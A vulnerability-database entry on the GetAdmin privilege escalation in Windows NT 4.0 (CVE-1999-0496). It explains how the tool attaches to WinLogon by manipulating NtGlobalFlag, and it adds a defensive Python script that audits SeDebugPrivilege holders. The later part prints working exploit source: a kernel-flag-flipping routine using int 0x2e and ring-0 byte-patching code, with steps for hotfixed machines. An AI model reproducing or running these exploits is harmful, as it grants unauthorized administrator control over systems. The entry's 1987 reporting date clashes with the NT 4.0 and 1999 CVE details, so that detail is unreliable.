Brief description: program gives Administrator rights
Full description: Getadmin.exe attaches to the WinLogon process, which is running in the system's security context. It then makes standard API calls that add the specified user to the Administrators group.
Any account that has the "Debug Programs" right will always be able to run Getadmin.exe successfully, because the "Debug Programs" right allows a user to attach to any process. The "Debug Programs" right is initially granted to Administrators and should be granted only to fully trusted users. Members of the Administrators group always have the rights to make the calls GetAdmin.exe needs in order to succeed, so if an account in that group runs Getadmin.exe, it works.
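Because the "Debug Programs" right (SeDebugPrivilege) is the one that lets an account attach to WinLogon, a defender's first check is who holds it. The following is an added auditing example, not part of the original entry or of the GetAdmin tool: it parses the [Privilege Rights] section of a `secedit /export /cfg <file>` INF export and reports every SeDebugPrivilege holder other than the built-in Administrators group (SID S-1-5-32-544). The INF text below is a constructed sample, not a real capture; the parser assumes holders are listed either as `*SID` or as plain account names.

```python
# Audit SeDebugPrivilege holders from a `secedit /export /cfg <file>` INF export.
# Added example (not from the original entry); the sample export is constructed.

# Constructed sample of the export. Real exports have more sections and rights.
SAMPLE_EXPORT = """[Unicode]
Unicode=yes
[Privilege Rights]
SeDebugPrivilege = *S-1-5-32-544,*S-1-5-21-1000-2000-3000-1105,BUILDDOMAIN\\svc_build
SeShutdownPrivilege = *S-1-5-32-544,*S-1-5-32-545
[Version]
signature="$CHICAGO$"
Revision=1
"""

# Well-known SID whose presence on SeDebugPrivilege is expected (BUILTIN\Administrators).
EXPECTED_DEBUG_HOLDERS = {"S-1-5-32-544"}


def parse_privilege_rights(text):
    """Return {privilege_name: [holder, ...]} from the [Privilege Rights] section.

    Holders are given as '*SID' (the asterisk is stripped) or, assumed here,
    as plain DOMAIN\\account names; both forms are kept as strings.
    """
    rights = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            # Section header: only [Privilege Rights] is of interest.
            in_section = (line.lower() == "[privilege rights]")
            continue
        if not in_section or "=" not in line:
            continue
        name, _, value = line.partition("=")
        holders = [h.strip().lstrip("*") for h in value.split(",") if h.strip()]
        rights[name.strip()] = holders
    return rights


def unexpected_debug_holders(text, expected=EXPECTED_DEBUG_HOLDERS):
    """List SeDebugPrivilege holders that are not in the expected set."""
    holders = parse_privilege_rights(text).get("SeDebugPrivilege", [])
    return [h for h in holders if h not in expected]


if __name__ == "__main__":
    # On a real host: secedit /export /cfg rights.inf, then read that file here.
    for holder in unexpected_debug_holders(SAMPLE_EXPORT):
        print("SeDebugPrivilege granted to non-default principal:", holder)
```

Any principal the script prints can attach to a process running in the system's security context, so each one should be justified or removed from the right; on a domain, the same export can be taken on the PDC, where the entry notes the tool actually modifies the domain account database.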
Getadmin.exe must be executed locally. It works for accounts on a workstation or member server and for domain accounts on a primary domain controller (PDC). The utility does not function on a backup domain controller (BDC) because the account database on a BDC is read-only. The only way to use GetAdmin to modify a domain account database is to log on to a primary domain controller and run the utility locally on the PDC.
Getadmin.exe works because of a problem in a low-level kernel routine that causes a global flag to be set which allows calls to NtOpenProcessToken to succeed regardless of the current user's permissions. This in turn allows a user to attach to any process running on the system, including a process running in the system's security context, such as WinLogon. Once attached to such a process, a thread can be started in the security context of the process.
Components: WinLogon process, NtOpenProcessToken
Systems: Windows NT 4.0 (workstation, server, and terminal server editions) with SP-2 or earlier, or with the standard SP-3 without the fix for this problem (there is a version of SP-3 that addresses it); not Windows NT 3.51
Effect(s) of exploiting: The user acquires Administrator privileges.
Detecting the hole:
Fixing the hole:
Other information: The Registry keys accessed are: Policy key, Security policy description key, unknown,
program, attack tool
PA Classification(s): not yet classified
RISOS Classification(s):
DCS Classification(s):
CVE Number: cve-1999-0496 -- A Windows NT 4.0 user can gain administrative rights by forcing NtOpenProcessToken to succeed regardless of the user's permissions, aka GetAdmin.
Attack: The attack tool is available from Fravia or from Pete Shipley
Here is the code, by Konstantin Sobolev. Call
ChangeNtGlobalFlag(GetNtGlobalFlagPtr());
where:
#include <windows.h>   /* BOOL, DWORD, CHAR */
#include <stdio.h>     /* sprintf */

BOOL ChangeNtGlobalFlag(DWORD pNtGlobalFlag)
{
    DWORD callnumber = 0x3;     // NtAddAtom system call number on NT 4.0
    DWORD stack[32];            // argument block handed to the system call
    int i;
    DWORD handle = 0;
    CHAR string[255];

    if (!pNtGlobalFlag)
        return 0;

    stack[0] = (DWORD)string;
    stack[1] = (DWORD)&handle;  // pNtGlobalFlag;
    for (i = 0; i <= 0x100; i++) {
        sprintf(string, "NT now cracking... pass %d", i);
        if (handle & 0xf00) {
            // once the atom handle reaches this range, point the output at the flag
            stack[1] = (DWORD)pNtGlobalFlag + 1;
        }
        __asm {
            mov eax, callnumber;
            mov edx, stack;
            lea edx, dword ptr [stack];
            int 0x2e;
        }
        if (stack[1] == pNtGlobalFlag + 1)
            break;
    }
    return TRUE;
}

To get administrator rights on a hotfixed machine, run crash4.exe, then run getadmin.exe. Exploit code follows:
/* Running ring 0 code. Author: Costin RAIU
   #include standard_disclaimer
   ****** NOTICE: COMPILE THIS WITH BORLAND C 5.0 ONLY!!! DOES NOT WORK WITH VC++!!! ****** */
void* a[2];

void main(void)
{
    int i;
    for (i = 0; i < 2; i++)
        a[i] = (void*)0;
    *(char*)(0x4080a4) = 0x80;  // or bptr [NtGlobalFlag+2],0f
    *(char*)(0x4080a5) = 0x0d;
    *(char*)(0x4080a6) = 0xb6;
    *(char*)(0x4080a7) = 0xc2;
    *(char*)(0x4080a8) = 0x14;
    *(char*)(0x4080a9) = 0x80;
    *(char*)(0x4080aa) = 0xc1;
    *(char*)(0x4080ab) = 0xcf;
    _asm {
        mov eax, 4346
        mov edx, offset a
        int 2eh
    }
}
Advisories: none yet
Related Vulnerabilities: none yet
Reporting: Konstantin Sobolev; Costin Raiu in ntbugtraq (June 30, 1987)